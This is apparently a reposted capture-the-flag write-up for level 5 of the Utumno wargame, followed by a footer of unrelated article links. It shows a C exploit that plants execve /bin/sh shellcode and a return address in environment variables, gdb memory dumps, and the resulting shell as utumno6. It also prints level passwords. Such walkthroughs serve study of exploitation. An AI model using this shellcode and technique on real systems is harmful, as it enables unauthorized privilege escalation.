utumno - 5
来源:互联网 发布:知乎怎么私信匿名用户 编辑:程序博客网 时间:2024/06/05 22:51
root@today:~/Desktop/misc/utumno/utumno5# ssh utumno5@178.79.134.250utumno5@178.79.134.250's password: woucaejiekutumno5@melinda:~$ mkdir /tmp/utu5utumno5@melinda:~$ cd /tmp/utu5utumno5@melinda:/tmp/utu5$ cat hacker.c
#include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]){ char *arg[] = {0x00}; char *envp[] = { "", "", "", "", "", "", "", "", "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80","UUUUUUUUUUUUUUUU\xba\xdf\xff\xff", NULL };execve("/utumno/utumno5", arg, envp); perror("execve"); exit(1); }
utumno5@melinda:/tmp/utu5$ gcc hacker.c -o hacker -m32 -gutumno5@melinda:/tmp/utu5$ gdb -tui hacker(gdb) b *mainBreakpoint 1 at 0x804847d: file hacker.c, line 6.(gdb) runStarting program: /tmp/utu5/hacker Breakpoint 1, main (argc=1, argv=0xffffd684) at hacker.c:6(gdb) cContinuing.process 23083 is executing new program: /games/utumno/utumno5Breakpoint 1, main (argc=0, argv=0xffffdec4) at utumno5.c:38(gdb) ni(gdb) ni (gdb) x/24dbx $ebp0xffffde28: 0x00 0x00 0x00 0x00 0x63 0xda 0xe3 0xf70xffffde30: 0x00 0x00 0x00 0x00 0xc4 0xde 0xff 0xff0xffffde38: 0xc8 0xde 0xff 0xff 0xea 0xac 0xfe 0xf7
#0x0c(%ebp) = 0xffffdec4
(gdb) x/48dbx 0xffffdec40xffffdec4: 0x00 0x00 0x00 0x00 0xb2 0xdf 0xff 0xff0xffffdecc: 0xb3 0xdf 0xff 0xff 0xb4 0xdf 0xff 0xff0xffffded4: 0xb5 0xdf 0xff 0xff 0xb6 0xdf 0xff 0xff0xffffdedc: 0xb7 0xdf 0xff 0xff 0xb8 0xdf 0xff 0xff0xffffdee4: 0xb9 0xdf 0xff 0xff 0xba 0xdf 0xff 0xff0xffffdeec: 0xd3 0xdf 0xff 0xff 0x00 0x00 0x00 0x00(gdb) x/24dbx 0xffffdfba0xffffdfba: 0x6a 0x0b 0x58 0x31 0xf6 0x56 0x68 0x2f0xffffdfc2: 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e0xffffdfca: 0x89 0xe3 0x31 0xc9 0x89 0xca 0xcd 0x80(gdb) x/24dbx 0xffffdfd30xffffdfd3: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x550xffffdfdb: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x550xffffdfe3: 0xba 0xdf 0xff 0xff 0x00 0x2f 0x75 0x74
utumno5@melinda:/tmp/utu5$ ./hacker Here we go - UUUUUUUUUUUUUUUU锟斤拷锟斤拷$ whoamiutumno6$ cat /etc/utumno_pass/utumno6eiluquieth$
0 0
- utumno - 5
- utumno - 0
- utumno - 1
- utumno - 2
- utumno - 3
- utumno - 4
- utumno - 6
- utumno - 7
- 170910 WarGames-Utumno(2)
- 170911 WarGames-Utumno(3)
- 170909 WarGames-Utumno(0-1)
- 5
- 5
- 5
- 5
- 5
- 5
- 5
- 线程同步机制synchronized
- ios多语言适配
- 标准linu休眠和唤醒机制分析(三)
- swift判断是否已插入耳塞
- Docker 制作Apache+PHP+GD+MongoDB+Redis镜像
- utumno - 5
- 使用亚马逊AWS免费云服务器创建VPN(Ubuntu系统)
- 文章标题
- WARN (org.apache.commons.httpclient.HttpMethodBase:1511) - Cookie rejected 警告
- Elasticsearch2.3.1中文分词ik插件安装
- Netty系列之Netty高性能之道
- iOS UIFont 字体名字
- eclipse 安装 TestNG插件的方法
- FZU-1881-Problem 1881 三角形问题,打表二分查找~~